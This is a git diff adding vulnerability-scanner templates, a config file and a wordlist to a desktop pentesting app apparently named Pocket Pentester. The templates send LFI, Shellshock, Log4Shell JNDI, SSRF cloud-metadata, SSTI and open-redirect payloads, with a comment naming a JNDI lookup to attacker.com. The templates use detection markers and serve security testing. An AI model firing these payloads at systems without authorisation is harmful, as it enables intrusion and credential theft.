+      # HEAD file is short + starts with "ref:" or is a 40-char hex hash
+      - type: regex
+        part: body
+        regex:
+          - "^(ref: refs/heads/|[a-f0-9]{40})"
+      - type: dsl
+        dsl:
+          - "size < 200"
diff --git a/src-tauri/starter_templates/xpl-lfi-basic.yaml b/src-tauri/starter_templates/xpl-lfi-basic.yaml
new file mode 100644
index 0000000..52653e0
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-lfi-basic.yaml
@@ -0,0 +1,42 @@
+id: xpl-lfi-basic
+info:
+  name: "Local File Inclusion (LFI)"
+  author: imtaqin
+  severity: high
+  description: |
+    Classic path-traversal test across common vulnerable parameters.
+    Uses clusterbomb attack to combine traversal depths and payloads.
+  tags:
+    - lfi
+    - path-traversal
+  reference:
+    - https://owasp.org/www-community/attacks/Path_Traversal
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?page={{fuzz}}"
+      - "{{BaseURL}}/?file={{fuzz}}"
+      - "{{BaseURL}}/download?file={{fuzz}}"
+      - "{{BaseURL}}/view.php?template={{fuzz}}"
+    attack: batteringram
+    payloads:
+      fuzz:
+        - "../../../../etc/passwd"
+        - "../../../../../../etc/passwd"
+        - "....//....//....//etc/passwd"
+        - "..%2f..%2f..%2fetc%2fpasswd"
+        - "php://filter/convert.base64-encode/resource=index.php"
+    stop_at_first_match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0:"
+        name: etc-passwd
+      - type: regex
+        part: body
+        regex:
+          - "^[A-Za-z0-9+/]{100,}={0,2}$"
+        name: base64-filter
diff --git a/src-tauri/starter_templates/xpl-open-redirect.yaml b/src-tauri/starter_templates/xpl-open-redirect.yaml
new file mode 100644
index 0000000..562a2dd
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-open-redirect.yaml
@@ -0,0 +1,29 @@
+id: xpl-open-redirect
+info:
+  name: "Open Redirect"
+  author: imtaqin
+  severity: medium
+  description: |
+    Redirect parameters that accept arbitrary external URLs, usable
+    for phishing + OAuth token theft.
+  tags:
+    - open-redirect
+    - phishing
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/redirect?url=https://evil.example/"
+      - "{{BaseURL}}/go?to=https://evil.example/"
+      - "{{BaseURL}}/out?dest=https://evil.example/"
+      - "{{BaseURL}}/login?next=https://evil.example/"
+    redirects: false
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [301, 302, 303, 307, 308]
+      - type: regex
+        part: header
+        regex:
+          - "(?i)^location:\\s*https?://evil\\.example"
+        name: redirect-to-evil
diff --git a/src-tauri/starter_templates/xpl-phpinfo.yaml b/src-tauri/starter_templates/xpl-phpinfo.yaml
new file mode 100644
index 0000000..cb44979
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-phpinfo.yaml
@@ -0,0 +1,43 @@
+id: xpl-phpinfo
+info:
+  name: "phpinfo() Exposure"
+  author: imtaqin
+  severity: medium
+  description: |
+    phpinfo pages reveal PHP version, loaded modules, environment
+    variables, and file-system paths.
+  tags:
+    - exposure
+    - php
+    - infoleak
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phpinfo.php"
+      - "{{BaseURL}}/info.php"
+      - "{{BaseURL}}/test.php"
+      - "{{BaseURL}}/_profiler/phpinfo"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # must contain all 3 phpinfo signatures to be confident
+      - type: word
+        part: body
+        words:
+          - "PHP Version"
+          - "phpinfo()"
+          - "System"
+        condition: and
+      - type: word
+        part: body
+        words:
+          - "<title>phpinfo()</title>"
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "PHP Version </td><td class=\"v\">([0-9.]+)"
+        group: 1
+        name: php-version
diff --git a/src-tauri/starter_templates/xpl-rce-log4shell.yaml b/src-tauri/starter_templates/xpl-rce-log4shell.yaml
new file mode 100644
index 0000000..de6c4ed
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-rce-log4shell.yaml
@@ -0,0 +1,52 @@
+id: xpl-rce-log4shell
+info:
+  name: "Log4Shell JNDI Injection (CVE-2021-44228)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Checks common endpoints for reflection of JNDI lookup payloads.
+    NOTE: true blind RCE detection requires an OOB server —
+    the cloud subscription provides interact.sh-lite for reliable
+    callback validation.
+  tags:
+    - cve
+    - rce
+    - log4j
+    - jndi
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-score: 10.0
+    cve-id: CVE-2021-44228
+
+# TODO(backend): when OOB is enabled, swap `${jndi:ldap://attacker.com}`
+# for `${jndi:ldap://{{interactsh-url}}/{{randstr}}}` and correlate callbacks.
+
+variables:
+  canary: "xpl_log4j_{{randstr}}"
+  jndi: "${jndi:ldap://xpl.invalid/{{canary}}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      User-Agent: "{{jndi}}"
+      X-Api-Version: "{{jndi}}"
+      Referer: "{{jndi}}"
+      X-Forwarded-For: "{{jndi}}"
+      Authorization: "Bearer {{jndi}}"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: all
+        words:
+          - "{{canary}}"
+        name: canary-echo
+      - type: word
+        part: body
+        words:
+          - "java.net.UnknownHostException: xpl.invalid"
+          - "JndiLookup"
+        condition: or
+        name: jndi-error
diff --git a/src-tauri/starter_templates/xpl-rce-shellshock.yaml b/src-tauri/starter_templates/xpl-rce-shellshock.yaml
new file mode 100644
index 0000000..a76986f
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-rce-shellshock.yaml
@@ -0,0 +1,47 @@
+id: xpl-rce-shellshock
+info:
+  name: "Bash Shellshock RCE (CVE-2014-6271)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Remote code execution via malformed function definitions in Bash
+    environment variables, exploitable through CGI endpoints.
+  tags:
+    - cve
+    - rce
+    - shellshock
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-6271
+  classification:
+    cvss-score: 10.0
+    cve-id: CVE-2014-6271
+
+variables:
+  marker: "xpl_shock_{{randstr}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/status"
+      - "{{BaseURL}}/cgi-bin/test"
+      - "{{BaseURL}}/cgi-bin/test.cgi"
+      - "{{BaseURL}}/cgi-bin/test.sh"
+      - "{{BaseURL}}/cgi-bin/bash"
+      - "{{BaseURL}}/cgi-bin/env"
+      - "{{BaseURL}}/cgi-bin/info.sh"
+    headers:
+      User-Agent: "() { :; }; echo; echo; /bin/echo {{marker}}"
+      Cookie: "() { :; }; echo; echo; /bin/echo {{marker}}"
+      Referer: "() { :; }; echo; echo; /bin/echo {{marker}}"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+        name: body-reflection
+      - type: word
+        part: header
+        words:
+          - "{{marker}}"
+        name: header-reflection
diff --git a/src-tauri/starter_templates/xpl-ssrf-basic.yaml b/src-tauri/starter_templates/xpl-ssrf-basic.yaml
new file mode 100644
index 0000000..91158ae
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-ssrf-basic.yaml
@@ -0,0 +1,36 @@
+id: xpl-ssrf-basic
+info:
+  name: "Server-Side Request Forgery (basic reflection)"
+  author: imtaqin
+  severity: high
+  description: |
+    Checks for reflection of internal metadata endpoints in response
+    bodies via common SSRF-prone parameters.
+    NOTE: blind SSRF requires OOB (cloud tier).
+  tags:
+    - ssrf
+
+# TODO(backend): swap http://169.254.169.254 for {{interactsh-url}} when
+# the cloud OOB server is enabled; correlate DNS/HTTP callbacks.
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
+      - "{{BaseURL}}/proxy?u=http://169.254.169.254/latest/meta-data/"
+      - "{{BaseURL}}/image?src=http://169.254.169.254/"
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ami-id"
+          - "instance-id"
+          - "security-credentials"
+        condition: or
+        name: aws-metadata-reflected
+      - type: regex
+        part: body
+        regex:
+          - "(?i)computeMetadata|project-id"
+        name: gcp-metadata-reflected
diff --git a/src-tauri/starter_templates/xpl-ssti-jinja2.yaml b/src-tauri/starter_templates/xpl-ssti-jinja2.yaml
new file mode 100644
index 0000000..26d4dfe
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-ssti-jinja2.yaml
@@ -0,0 +1,43 @@
+id: xpl-ssti-jinja2
+info:
+  name: "Server-Side Template Injection (Jinja2/Flask)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Detects Jinja2 SSTI by injecting a math expression with an unusual
+    product (999 * 777 = 776223) that's unlikely to appear naturally.
+    Confirms only when the exact computed value is reflected AND the
+    raw payload with {{ }} is NOT echoed back verbatim.
+  tags:
+    - ssti
+    - rce
+    - python
+    - jinja2
+
+http:
+  # Payload is literal `xplZZZ{{999*777}}ssti` — the engine's expand() leaves
+  # {{999*777}} alone since it's not a known variable name. If the target has
+  # Jinja2 SSTI on that parameter, the server renders it to `xplZZZ776223ssti`.
+  - method: GET
+    path:
+      - "{{BaseURL}}/?name=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/?q=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/search?q=xplZZZ{{999*777}}ssti"
+      - "{{BaseURL}}/hello/xplZZZ{{999*777}}ssti"
+    stop_at_first_match: true
+    matchers-condition: and
+    matchers:
+      # must be 2xx (not 400/404 - those show errors which may contain our payload)
+      - type: status
+        status: [200, 201, 204]
+      # computed value must appear — very specific string
+      - type: word
+        part: body
+        words:
+          - "xplZZZ776223ssti"
+      # raw payload must NOT be echoed verbatim (server evaluated it)
+      - type: word
+        part: body
+        words:
+          - "xplZZZ{{999*777}}ssti"
+        negative: true
diff --git a/src-tauri/starter_templates/xpl-ssti-twig.yaml b/src-tauri/starter_templates/xpl-ssti-twig.yaml
new file mode 100644
index 0000000..eaa0f22
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-ssti-twig.yaml
@@ -0,0 +1,35 @@
+id: xpl-ssti-twig
+info:
+  name: "Server-Side Template Injection (Twig/PHP)"
+  author: imtaqin
+  severity: critical
+  description: |
+    Twig SSTI via upper() filter on a unique marker. Confirms only when
+    the unique uppercase value is reflected AND the raw {{ }} payload
+    is NOT echoed back.
+  tags:
+    - ssti
+    - rce
+    - php
+    - twig
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "name=xplZZZ{{'xplmarker'|upper}}ssti"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200, 201]
+      - type: word
+        part: body
+        words:
+          - "xplZZZXPLMARKERssti"
+      - type: word
+        part: body
+        words:
+          - "{{'xplmarker'|upper}}"
+        negative: true
diff --git a/src-tauri/starter_templates/xpl-wp-debug.yaml b/src-tauri/starter_templates/xpl-wp-debug.yaml
new file mode 100644
index 0000000..975afcd
--- /dev/null
+++ b/src-tauri/starter_templates/xpl-wp-debug.yaml
@@ -0,0 +1,37 @@
+id: xpl-wp-debug
+info:
+  name: "WordPress debug.log Exposure"
+  author: imtaqin
+  severity: medium
+  tags:
+    - wordpress
+    - exposure
+    - debug
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/debug.log"
+      - "{{BaseURL}}/wp-content/uploads/debug.log"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+      # PHP log entries have specific format: [date time UTC] line
+      - type: regex
+        part: body
+        regex:
+          - "^\\[\\d{2}-\\w{3}-\\d{4}"
+      - type: word
+        part: body
+        words:
+          - "PHP Notice"
+          - "PHP Warning"
+          - "PHP Fatal error"
+          - "WordPress database error"
+        condition: or
+      - type: regex
+        part: header
+        regex:
+          - "(?i)content-type:\\s*text/html"
+        negative: true
diff --git a/src-tauri/tauri.conf.json b/src-tauri/tauri.conf.json
new file mode 100644
index 0000000..e5c5889
--- /dev/null
+++ b/src-tauri/tauri.conf.json
@@ -0,0 +1,35 @@
+{
+  "$schema": "https://schema.tauri.app/config/2",
+  "productName": "Pocket Pentester",
+  "version": "0.1.0",
+  "identifier": "com.imtaqin.pocketpentester",
+  "build": {
+    "beforeDevCommand": "npm run dev",
+    "devUrl": "http://localhost:1420",
+    "beforeBuildCommand": "npm run build",
+    "frontendDist": "../dist"
+  },
+  "app": {
+    "windows": [
+      {
+        "title": "Pocket Pentester",
+        "width": 800,
+        "height": 600
+      }
+    ],
+    "security": {
+      "csp": null
+    }
+  },
+  "bundle": {
+    "active": true,
+    "targets": "all",
+    "icon": [
+      "icons/32x32.png",
+      "icons/128x128.png",
+      "icons/128x128@2x.png",
+      "icons/icon.icns",
+      "icons/icon.ico"
+    ]
+  }
+}
diff --git a/src-tauri/wordlists/en-common.lst b/src-tauri/wordlists/en-common.lst
new file mode 100644
index 0000000..d13ec8e
--- /dev/null
+++ b/src-tauri/wordlists/en-common.lst
@@ -0,0 +1,2184 @@
+the
+of
+and
+to
+a
+in
+for
+is
+on
+that
+by
+this
+with
+i
+you
+it
+not
+or
+be
+are
+from
+at
+as
+your
+all
+have
+new
+more
+an
+was
+we
+will
+home
+can
+us
+if
+page
+my
+has
+free
+but
+our
+one
+do
+no
+time
+they
+site
+he
+up
+may
+what
+news
+out
+use
+any
+see
+only
+so
+his
+when
+here
+who
+web
+also
+now
+help
+get
+pm
+view
+c
+e
+am
+been
+how
+were
+me
+s
+some
+its
+like
+x
+than
+find
+date
+back
+top
+had
+list
+name
+just
+over
+year
+day
+into
+two
+n
+re
+next
+used
+go
+b
+work
+last
+most
+buy
+data
+make
+them
+post
+her
+city
+t
+add
+such
+best
+then
+jan
+good
+well
+d
+info
+high
+m
+each
+she
+very
+book
+r
+read
+need
+many
+user
+said
+de
+does
+set
+mail
+full
+map
+life
+know
+way
+days
+p
+part
+real
+f
+item
+ebay
+must
+made
+off
+line
+did
+send
+type
+car
+take
+area
+want
+dvd
+l
+long
+w
+code
+show
+o
+even
+much
+sign
+file
+link
+open
+case
+same
+uk
+own
+both
+g
+game
+care
+down
+end
+h
+him
+per
+big
+law
+size
+art
+shop
+text
+rate
+usa
+v
+form
+love
+old
+john
+main
+call
+non
+k
+y
+why
+cd
+save
+low
+york
+man
+card
+jobs
+j
+food
+u
+sale
+job
+teen
+room
+too
+join
+men
+west
+look
+left
+team
+box
+gay
+week
+note
+live
+june
+air
+plan
+tv
+yes
+hot
+cost
+la
+say
+july
+test
+come
+dec
+pc
+cart
+san
+play
+tax
+less
+got
+blog
+let
+park
+side
+act
+red
+give
+q
+sell
+key
+body
+few
+east
+ii
+age
+club
+z
+road
+gift
+ca
+hard
+oct
+pay
+four
+war
+nov
+blue
+al
+easy
+fax
+yet
+star
+hand
+sun
+rss
+id
+keep
+baby
+run
+net
+term
+film
+put
+co
+try
+head
+cell
+self
+away
+once
+log
+sure
+faq
+cars
+tell
+able
+fun
+gold
+feb
+sep
+arts
+lot
+ask
+past
+due
+et
+five
+upon
+says
+mar
+land
+done
+pro
+st
+url
+aug
+ever
+ago
+word
+bill
+apr
+talk
+via
+kids
+true
+else
+mark
+rock
+bad
+tips
+plus
+auto
+edit
+fast
+fact
+unit
+tech
+meet
+far
+en
+feel
+bank
+risk
+jul
+town
+jun
+girl
+toys
+golf
+loan
+wide
+sort
+half
+step
+none
+paul
+lake
+sony
+fire
+chat
+html
+loss
+face
+oil
+bit
+base
+near
+oh
+stay
+turn
+mean
+king
+copy
+drug
+pics
+cash
+bay
+ad
+seen
+port
+stop
+bar
+dog
+soon
+held
+ny
+eur
+mind
+pdf
+lost
+tour
+menu
+hope
+wish
+role
+came
+usr
+dc
+mon
+com
+fine
+hour
+gas
+six
+bush
+pre
+huge
+sat
+zip
+bid
+kind
+move
+logo
+nice
+ok
+sent
+band
+ms
+lead
+went
+fri
+hi
+mode
+fund
+wed
+male
+took
+inn
+song
+cnet
+ltd
+los
+hp
+late
+fall
+idea
+inc
+win
+tool
+eg
+bed
+ip
+hill
+maps
+deal
+hold
+tue
+safe
+feed
+pa
+thu
+sea
+cut
+hall
+anti
+tel
+ship
+tx
+paid
+hair
+kit
+tree
+thus
+wall
+ie
+el
+ma
+boy
+wine
+vote
+ways
+est
+son
+rule
+mac
+iii
+gmt
+max
+told
+xml
+feet
+bin
+door
+cool
+md
+fl
+mb
+asia
+uses
+mr
+java
+pass
+van
+fees
+skin
+prev
+ads
+mary
+il
+ring
+pop
+int
+iraq
+boys
+deep
+rest
+hit
+mm
+pool
+mini
+fish
+eye
+pack
+born
+race
+usb
+ed
+php
+etc
+debt
+core
+sets
+wood
+msn
+fee
+rent
+las
+dark
+le
+min
+aid
+host
+isbn
+fair
+az
+ohio
+gets
+un
+fat
+saw
+dead
+mike
+trip
+pst
+mi
+poor
+eyes
+farm
+tom
+lord
+sub
+hear
+goes
+led
+fan
+wife
+ten
+hits
+zone
+th
+cat
+die
+jack
+flat
+flow
+dr
+path
+kb
+laws
+pet
+guy
+dev
+cup
+vol
+pp
+na
+skip
+diet
+army
+gear
+lee
+os
+lots
+firm
+jump
+dvds
+ball
+goal
+sold
+wind
+palm
+bob
+fit
+ex
+met
+pain
+xbox
+www
+oral
+ford
+edge
+root
+au
+fi
+ice
+pink
+shot
+nc
+llc
+sec
+bus
+cold
+bag
+po
+va
+foot
+mass
+ibm
+rd
+sc
+heat
+wild
+miss
+task
+nor
+bug
+mid
+se
+soft
+fuel
+walk
+wait
+rose
+jim
+di
+km
+pick
+del
+ga
+ac
+ft
+load
+tags
+joe
+guys
+drop
+cds
+rich
+im
+vs
+ipod
+ar
+mo
+seem
+sa
+hire
+gave
+ones
+xp
+rank
+kong
+died
+inch
+lab
+cvs
+snow
+eu
+camp
+des
+fill
+cc
+lcd
+wa
+ave
+dj
+gone
+fort
+cm
+wi
+gene
+disc
+ct
+boat
+icon
+ends
+da
+cast
+felt
+pic
+soul
+aids
+flag
+nj
+hr
+em
+iv
+atom
+rw
+iron
+void
+tag
+mix
+disk
+vhs
+fix
+desk
+dave
+hong
+vice
+ne
+ray
+du
+duty
+bear
+gain
+lack
+iowa
+dry
+spa
+knew
+con
+ups
+zoom
+blow
+clip
+nt
+es
+wire
+tape
+spam
+acid
+cent
+null
+zero
+gb
+bc
+pr
+roll
+fr
+bath
+aa
+var
+font
+mt
+beta
+fail
+won
+jazz
+bags
+doc
+wear
+mom
+rare
+bars
+row
+oz
+dual
+rise
+usd
+mg
+bird
+lady
+fans
+eat
+dell
+seat
+aim
+bids
+toll
+les
+cape
+ann
+tip
+mine
+whom
+ski
+math
+ch
+dan
+dogs
+sd
+moon
+fly
+fear
+rs
+wars
+kept
+hey
+beat
+bbc
+arms
+tea
+avg
+sky
+utah
+rom
+hide
+toy
+slow
+src
+hip
+faqs
+nine
+eric
+spot
+grow
+dot
+hiv
+pda
+rain
+onto
+dsl
+zum
+dna
+diff
+bass
+hole
+pets
+ride
+tim
+sql
+pair
+don
+ss
+runs
+yeah
+ap
+nm
+mn
+nd
+evil
+gps
+op
+acc
+euro
+cap
+ink
+peak
+tn
+salt
+bell
+pin
+raw
+gnu
+jeff
+ben
+lane
+kill
+aol
+ce
+ages
+plug
+cook
+hat
+perl
+lib
+bike
+ab
+utc
+der
+lose
+seek
+tony
+kits
+cam
+soil
+wet
+ram
+matt
+fox
+exit
+iran
+arm
+keys
+wave
+holy
+acts
+mesh
+dean
+poll
+unix
+bond
+pub
+tm
+sp
+jean
+hop
+visa
+nh
+gun
+pure
+lens
+draw
+fm
+warm
+babe
+crew
+legs
+sam
+pdt
+rear
+node
+lock
+mile
+mens
+bowl
+ref
+tank
+navy
+kid
+db
+pan
+ph
+dish
+ia
+pt
+adam
+slot
+psp
+ha
+ds
+gray
+ea
+und
+demo
+lg
+hate
+rice
+loop
+nfl
+gary
+vary
+rome
+arab
+milk
+nw
+boot
+ff
+push
+iso
+sum
+misc
+alan
+dear
+oak
+vat
+beer
+jose
+jane
+ps
+sir
+earn
+kim
+twin
+ky
+dont
+spy
+br
+bits
+lo
+suit
+ml
+chip
+res
+sit
+wow
+char
+cs
+echo
+que
+grid
+voip
+fig
+sf
+kg
+pull
+ut
+nasa
+tab
+si
+css
+mc
+nick
+plot
+qty
+pump
+lp
+anne
+bio
+exam
+ryan
+beds
+pcs
+grey
+bold
+von
+ag
+scan
+vi
+aged
+bulk
+sci
+edt
+pmid
+sin
+cute
+ba
+para
+cr
+pg
+seed
+ee
+peer
+meat
+ing
+ks
+alex
+bang
+bone
+bugs
+ftp
+med
+gate
+sw
+tone
+busy
+leg
+neck
+hd
+wing
+abc
+tiny
+rail
+jay
+gap
+tube
+belt
+er
+jr
+biz
+rob
+era
+gcc
+asp
+luck
+dial
+jet
+par
+gang
+nv
+cake
+mad
+semi
+andy
+cafe
+ken
+su
+exp
+till
+pen
+shoe
+sand
+joy
+cpu
+ran
+seal
+sr
+jon
+lies
+pipe
+nr
+ill
+lbs
+lay
+lol
+deck
+mp
+thin
+mph
+sick
+dose
+bet
+def
+lets
+li
+nl
+cats
+ya
+nba
+greg
+epa
+tr
+bb
+ron
+nz
+folk
+org
+okay
+hist
+lift
+lisa
+mall
+dad
+pat
+fell
+yard
+te
+av
+sean
+pour
+reg
+tion
+dust
+wiki
+kent
+adds
+nsw
+ear
+pci
+tie
+ward
+ian
+roof
+kiss
+ra
+mod
+rc
+bmw
+rush
+mpeg
+yoga
+lamp
+rico
+phil
+cst
+http
+ceo
+glad
+wins
+rack
+ec
+rep
+mit
+boss
+ross
+anna
+solo
+tall
+rm
+pdas
+sri
+toe
+nova
+api
+cf
+vt
+wake
+urw
+lan
+sms
+drum
+nec
+foto
+ease
+tabs
+gm
+ri
+pine
+tend
+gulf
+rt
+rick
+cp
+hunt
+thai
+fred
+dd
+mill
+den
+aud
+pl
+burn
+labs
+lie
+crm
+rf
+ak
+fe
+td
+amp
+sb
+ah
+sole
+sm
+laid
+clay
+weak
+usc
+blvd
+amd
+wise
+wv
+odds
+ns
+eve
+marc
+sons
+leaf
+pad
+ja
+bs
+rod
+cuba
+hrs
+silk
+kate
+bi
+sad
+wolf
+cal
+fits
+kick
+meal
+ta
+hurt
+pot
+img
+slip
+rpm
+cuts
+pee
+mars
+tvs
+egg
+mhz
+caps
+pill
+lat
+meta
+mint
+gi
+spin
+sur
+wash
+rev
+ll
+aims
+cl
+ieee
+ho
+corp
+gt
+sh
+soap
+ae
+nyc
+jam
+axis
+guns
+rio
+hs
+hero
+rv
+punk
+pi
+duke
+ai
+pace
+wage
+ot
+arc
+dawn
+carl
+coat
+mrs
+rica
+yr
+app
+roy
+ion
+doll
+ic
+peru
+nike
+fed
+reed
+mice
+ban
+temp
+zus
+vast
+ent
+odd
+wrap
+mood
+quiz
+mx
+gr
+ext
+beam
+tops
+amy
+ts
+shut
+ge
+ncaa
+thou
+phd
+mask
+ng
+pe
+coal
+cry
+tt
+zoo
+aka
+tee
+lion
+goto
+xl
+neil
+beef
+cad
+hats
+tcp
+surf
+dv
+dir
+hook
+cord
+val
+crop
+tu
+fy
+lite
+ghz
+hub
+rr
+eng
+ef
+ace
+sing
+tons
+sue
+ep
+hang
+gbp
+lb
+hood
+jp
+chi
+bt
+fame
+af
+rfc
+sl
+seo
+isp
+ins
+eggs
+hb
+jpg
+tc
+ruby
+mins
+ssl
+stem
+opt
+drew
+flu
+mlb
+rap
+tune
+corn
+gp
+puts
+grew
+tin
+trek
+oem
+ir
+ties
+rat
+brad
+jury
+dos
+tail
+lawn
+soup
+byte
+nose
+oclc
+plc
+juan
+msg
+cod
+thru
+jews
+trim
+cv
+cb
+gen
+espn
+nhl
+quit
+lung
+ti
+fc
+gel
+todd
+fw
+doug
+sees
+gs
+aaa
+bull
+cole
+mart
+tale
+lynn
+bp
+std
+docs
+vid
+oo
+coin
+fake
+fda
+cure
+arch
+ni
+hdtv
+asin
+bomb
+harm
+thy
+deer
+tri
+pal
+um
+ye
+fs
+nn
+mat
+oven
+ted
+noon
+gym
+kde
+vb
+cams
+joel
+yo
+proc
+tan
+fx
+mate
+dl
+chef
+isle
+slim
+luke
+comp
+alt
+pie
+ls
+cbs
+pete
+spec
+bow
+penn
+midi
+tied
+hon
+dale
+oils
+sept
+unto
+lt
+atm
+eq
+pays
+je
+lang
+stud
+fold
+uv
+cms
+sg
+vic
+pos
+phys
+pole
+mega
+bend
+moms
+glen
+nav
+cab
+fa
+ist
+lips
+pond
+lc
+dam
+cnn
+lil
+das
+tire
+chad
+sys
+josh
+drag
+icq
+ripe
+rely
+scsi
+cu
+dns
+pty
+ws
+nuts
+nail
+span
+sox
+joke
+univ
+tub
+pads
+inns
+cups
+ash
+ali
+np
+foam
+tft
+jvc
+poem
+dt
+cgi
+asks
+bean
+bias
+por
+mem
+gc
+tap
+ci
+swim
+nano
+yn
+vii
+bee
+loud
+rats
+cfr
+stat
+cruz
+bios
+pmc
+thee
+nb
+ruth
+pray
+pope
+jeep
+bare
+hung
+mba
+pit
+mono
+tile
+rx
+apps
+mag
+gsm
+ddr
+rec
+ciao
+knee
+prep
+pb
+chem
+ton
+oe
+gif
+pros
+cant
+jd
+gpl
+irc
+wy
+dm
+sara
+bra
+joan
+duck
+phi
+mls
+cow
+dive
+cet
+fiji
+audi
+raid
+ppc
+volt
+div
+dirt
+jc
+acer
+dist
+ons
+geek
+sink
+grip
+avi
+watt
+pins
+reno
+ide
+polo
+rpg
+horn
+pd
+prot
+frog
+logs
+tgp
+leo
+diy
+snap
+arg
+ur
+geo
+doe
+jpeg
+ati
+wal
+swap
+abs
+flip
+sim
+rna
+buzz
+nuke
+rid
+boom
+calm
+fork
+troy
+ln
+uc
+rip
+zope
+gmbh
+buf
+ld
+sims
+tray
+sol
+sage
+eco
+bat
+lip
+sap
+suse
+mf
+cave
+wool
+mw
+nu
+ict
+dp
+eyed
+ou
+grab
+oops
+xi
+sku
+ht
+za
+trap
+fool
+ve
+karl
+dies
+pts
+rh
+rrp
+fg
+jail
+ooo
+hz
+ipaq
+bk
+comm
+nhs
+aye
+lace
+ste
+ugly
+hart
+ment
+col
+dx
+sk
+biol
+yu
+rows
+sq
+oc
+aj
+treo
+gods
+une
+tex
+cia
+poly
+ears
+dod
+wp
+fist
+neo
+mere
+cons
+dig
+taxi
+om
+nat
+tp
+jm
+dpi
+gis
+loc
+worn
+shaw
+vp
+expo
+cn
+deny
+bali
+judy
+trio
+cube
+rugs
+fate
+gui
+gras
+ver
+rn
+rim
+zen
+dis
+kay
+oval
+cg
+soma
+ser
+href
+benz
+wifi
+tier
+fwd
+earl
+aus
+hwy
+guam
+cite
+nam
+ix
+gdp
+pig
+mess
+lit
+una
+ada
+tb
+rope
+dump
+yrs
+foo
+gba
+bm
+hose
+sig
+duo
+fog
+str
+pubs
+vip
+yea
+mild
+fur
+tar
+rj
+soc
+clan
+sync
+mesa
+rug
+ka
+hull
+dem
+wav
+shed
+memo
+ham
+tide
+funk
+fbi
+reel
+rp
+bind
+rand
+buck
+eh
+tba
+sie
+usgs
+acre
+lows
+aqua
+chen
+emma
+eva
+pest
+hc
+rca
+fp
+reef
+gst
+bon
+jj
+chan
+mas
+beth
+len
+kai
+dom
+jill
+sofa
+obj
+dans
+viii
+jar
+ev
+tent
+dept
+hack
+dare
+hawk
+lamb
+cos
+pac
+rl
+erp
+gl
+ui
+dh
+vpn
+fcc
+eds
+ro
+df
+junk
+wax
+lucy
+hans
+poet
+epic
+nut
+sake
+sans
+irs
+lean
+bye
+cdt
+ana
+dude
+luis
+ez
+pf
+uw
+alto
+eau
+bd
+mil
+gore
+cult
+dash
+cage
+divx
+hugh
+lap
+jake
+eval
+ping
+flux
+sao
+muze
+oman
+gmc
+hh
+rage
+adsl
+uh
+prix
+fd
+bo
+avon
+rays
+asn
+walt
+acne
+libs
+undo
+wm
+pk
+dana
+halo
+ppm
+ant
+gays
+apt
+exec
+inf
+eos
+vcr
+uri
+gem
+maui
+psi
+pct
+wb
+vids
+yale
+sn
+qld
+pas
+dk
+doom
+owen
+bite
+issn
+myth
+gig
+sas
+fu
+weed
+oecd
+dice
+quad
+dock
+mods
+hint
+msie
+wn
+liz
+ccd
+sv
+buys
+pork
+zu
+barn
+llp
+boc
+fare
+dg
+asus
+vg
+bald
+fuji
+leon
+mold
+dame
+fo
+herb
+tmp
+alot
+ate
+idle
+fin
+io
+mud
+uni
+ul
+ol
+js
+pn
+cove
+casa
+mu
+eden
+incl
+ala
+hq
+dip
+nbc
+reid
+wt
+flex
+rosa
+hash
+lazy
+mv
+mpg
+carb
+cas
+cio
+dow
+rb
+upc
+dui
+pens
+yen
+mh
+worm
+lid
+deaf
+mats
+pvc
+blah
+mime
+feof
+usda
+keen
+peas
+urls
+enb
+gg
+og
+ko
+owns
+til
+wto
+hay
+ww
+gd
+zinc
+guru
+isa
+levy
+grad
+bras
+pix
+mic
+kyle
+bw
+mj
+pale
+gaps
+tear
+lf
+ata
+nil
+nest
+pam
+nato
+cop
+gale
+dim
+stan
+idol
+wc
+mai
+hk
+abu
+moss
+ty
+cork
+cj
+mali
+mtv
+dome
+leu
+heel
+yang
+qc
+lou
+pgp
+aw
+sip
+tf
+pj
+cw
+wr
+dumb
+rg
+bl
+vc
+dee
+wx
+mae
+mel
+feat
+ntsc
+sic
+usps
+bg
+seq
+conf
+glow
+wma
+cir
+oaks
+erik
+hu
+acm
+kw
+paso
+norm
+ips
+dsc
+ware
+mia
+wan
+jade
+foul
+keno
+gtk
+seas
+ru
+pose
+mrna
+goat
+ira
+sen
+sail
+dts
+qt
+sega
+cdna
+pod
+wu
+bolt
+gage
+lu
+dat
+soa
+urge
+smtp
+kurt
+neon
+ours
+lone
+cope
+lm
+lime
+kirk
+bool
+cho
+wit
+bbs
+spas
+ind
